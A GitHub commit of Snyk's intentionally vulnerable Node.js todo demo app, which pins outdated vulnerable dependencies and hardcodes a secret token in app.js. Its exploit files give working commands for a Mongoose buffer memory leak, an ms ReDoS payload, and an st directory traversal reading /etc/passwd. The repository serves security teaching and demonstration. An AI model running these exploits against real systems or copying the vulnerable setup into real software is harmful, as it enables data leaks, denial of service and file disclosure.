forked from snyk-labs/nodejs-goof
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Danny Grander
committed
Mar 21, 2016
0 parents
commit dd59c14
Showing
20 changed files
with
666 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
.DS_Store | ||
node_modules | ||
*.sock | ||
|
||
.sass-cache | ||
sass | ||
config.rb | ||
npm-debug.log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
## Snyk's vulnerable todo list app | ||
[![Known Vulnerabilities](https://snyk.io/test/github/snyk/snyk-demo-todo/badge.svg?style=flat-square)](https://snyk.io/test/github/snyk/snyk-demo-todo) | ||
|
||
A vulnerable Node.js demo application, based on the [Dreamers Lab tutorial](http://dreamerslab.com/blog/en/write-a-todo-list-with-express-and-mongodb/). | ||
|
||
### Running | ||
```bash | ||
mongod & | ||
|
||
git clone https://github.com/Snyk/snyk-demo-todo | ||
npm install | ||
npm start | ||
``` | ||
### Cleanup | ||
To bulk delete the current list of TODO items from the DB run: | ||
```bash | ||
npm run cleanup | ||
``` | ||
|
||
### Exploiting the vulnerabilities | ||
|
||
This app uses npm dependencies holding known vulnerabilities. | ||
|
||
Here are the exploitable vulnerable packages: | ||
- [Mongoose - Buffer Memory Exposure](https://snyk.io/vuln/npm:mongoose:20160116) | ||
- [st - Directory Traversal](https://snyk.io/vuln/npm:st:20140206) | ||
- [ms - ReDoS](https://app.snyk.io/vuln/npm:ms:20151024) | ||
|
||
The `exploits` directory includes a series of steps to demonstrate each one. | ||
|
||
### Fixing the issues | ||
To find these flaws in this application (and in your own apps), run: | ||
``` | ||
npm install -g snyk | ||
snyk wizard | ||
``` | ||
|
||
In this application, the default `snyk wizard` answers will fix all the issues. | ||
When the wizard is done, restart the application and run the exploits again to confirm they are fixed. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,56 @@ | ||
/** | ||
* Module dependencies. | ||
*/ | ||
|
||
// mongoose setup | ||
require('./db'); | ||
|
||
var st = require('st'); | ||
var crypto = require('crypto'); | ||
var express = require('express'); | ||
var http = require('http'); | ||
var path = require('path'); | ||
var engine = require('ejs-locals'); | ||
var cookieParser = require('cookie-parser'); | ||
var bodyParser = require('body-parser'); | ||
var methodOverride = require('method-override'); | ||
var logger = require('morgan'); | ||
var errorHandler = require('errorhandler'); | ||
var optional = require('optional'); | ||
|
||
var app = express(); | ||
var routes = require('./routes'); | ||
|
||
// all environments | ||
app.set('port', process.env.PORT || 3001); | ||
app.engine('ejs', engine); | ||
app.set('views', path.join(__dirname, 'views')); | ||
app.set('view engine', 'ejs'); | ||
app.use(logger('dev')); | ||
app.use(methodOverride()); | ||
app.use(cookieParser()); | ||
app.use(bodyParser.json()); | ||
app.use(bodyParser.urlencoded({ extended: false })); | ||
|
||
// Routes | ||
app.use(routes.current_user); | ||
app.get('/', routes.index); | ||
app.post('/create', routes.create); | ||
app.get('/destroy/:id', routes.destroy); | ||
app.get('/edit/:id', routes.edit); | ||
app.post('/update/:id', routes.update); | ||
|
||
// Static | ||
app.use(st({path: './public', url: '/public'})); | ||
|
||
// development only | ||
if (app.get('env') == 'development') { | ||
app.use(errorHandler()); | ||
} | ||
|
||
var token = 'SECRET_TOKEN_f8ed84e8f41e4146403dd4a6bbcea5e418d23a9'; | ||
console.log('token: ' + token); | ||
|
||
http.createServer(app).listen(app.get('port'), function() { | ||
console.log('Express server listening on port ' + app.get('port')); | ||
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
var mongoose = require('mongoose'); | ||
var Schema = mongoose.Schema; | ||
|
||
var Todo = new Schema({ | ||
content : Buffer, | ||
updated_at : Date | ||
}); | ||
|
||
mongoose.model('Todo', Todo); | ||
mongoose.connect('mongodb://localhost/express-todo'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
### Note: these exploits use the httpie command line utility | ||
|
||
# start | ||
http http://target:3001/ --headers | ||
|
||
# Works as advertised | ||
echo 'content=Buy Beer' | http --form http://target:3001/create -v | ||
|
||
# Works with json | ||
echo '{"content":"Fix the bike"}' | http --json http://target:3001/create -v | ||
|
||
# Works with number string | ||
echo '{"content":"800"}' | http --json http://target:3001/create -v | ||
|
||
# Exploit start - integer | ||
echo '{"content":800}' | http --json http://target:3001/create -v | ||
|
||
# Switch to only showing the response body | ||
echo '{"content":800}' | http --json http://target:3001/create -b | ||
echo '{"content":800}' | http --json http://target:3001/create -b | base64 -D | ||
|
||
# Repeatedly extract memory | ||
# window 1 | ||
repeat 1000 echo '{"content":800}' | http --json http://target:3001/create -b | base64 -D >> leakedmem.bin | ||
|
||
# window 2 - see strings in the response | ||
tail -f leakedmem.bin | strings | ||
|
||
# window 3 - see a memory dum in the response | ||
tail -f leakedmem.bin | xxd -c 32 -g 32 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
# Working via curl | ||
echo 'content=Call mom in 20 minutes' | http --form http://target:3001/create -v | ||
|
||
# Works with long string that matches | ||
echo 'content=Buy milk in '`printf "%.0s5" {1..60000}`' minutes' | http --form http://target:3001/create -v | ||
|
||
# Hangs with long string that doesn't match | ||
echo 'content=Buy milk in '`printf "%.0s5" {1..60000}`' minutea' | http --form http://target:3001/create -v |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
# Works as advertised | ||
curl http://localhost:3001/public/about.html | ||
|
||
# Directory listing (not necessary) | ||
curl http://localhost:3001/public/ | ||
|
||
# Failed ../ | ||
curl http://localhost:3001/public/../../../ | ||
|
||
# Exploit start | ||
curl http://localhost:3001/public/%2e%2e/%2e%2e/%2e%2e/ | ||
|
||
# Exploit full | ||
curl "http://localhost:3001/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
{ | ||
"name": "snyk-todo-list-demo-app", | ||
"version": "0.0.2", | ||
"description": "A vulnerable todo demo application", | ||
"homepage": "https://snyk.io/", | ||
"repository": { | ||
"type": "git", | ||
"url": "https://github.com/Snyk/snyk-todo-list-demo-app/" | ||
}, | ||
"scripts": { | ||
"start": "node app.js", | ||
"cleanup": "mongo express-todo --eval 'db.todos.remove({});'" | ||
}, | ||
"dependencies": { | ||
"body-parser": "1.9.0", | ||
"cookie-parser": "1.3.3", | ||
"ejs": "1.0.0", | ||
"ejs-locals": "1.0.2", | ||
"errorhandler": "1.2.0", | ||
"express": "4.12.4", | ||
"humanize-ms": "latest", | ||
"method-override": "latest", | ||
"mongoose": "4.2.4", | ||
"morgan": "latest", | ||
"ms": "^0.7.1", | ||
"npmconf": "0.0.24", | ||
"optional": "^0.1.3", | ||
"st": "0.2.4", | ||
"tap": "^5.7.0" | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
<!DOCTYPE html> | ||
<html> | ||
<h1>The BESTest todo app evar</h1> | ||
</html> |
Oops, something went wrong.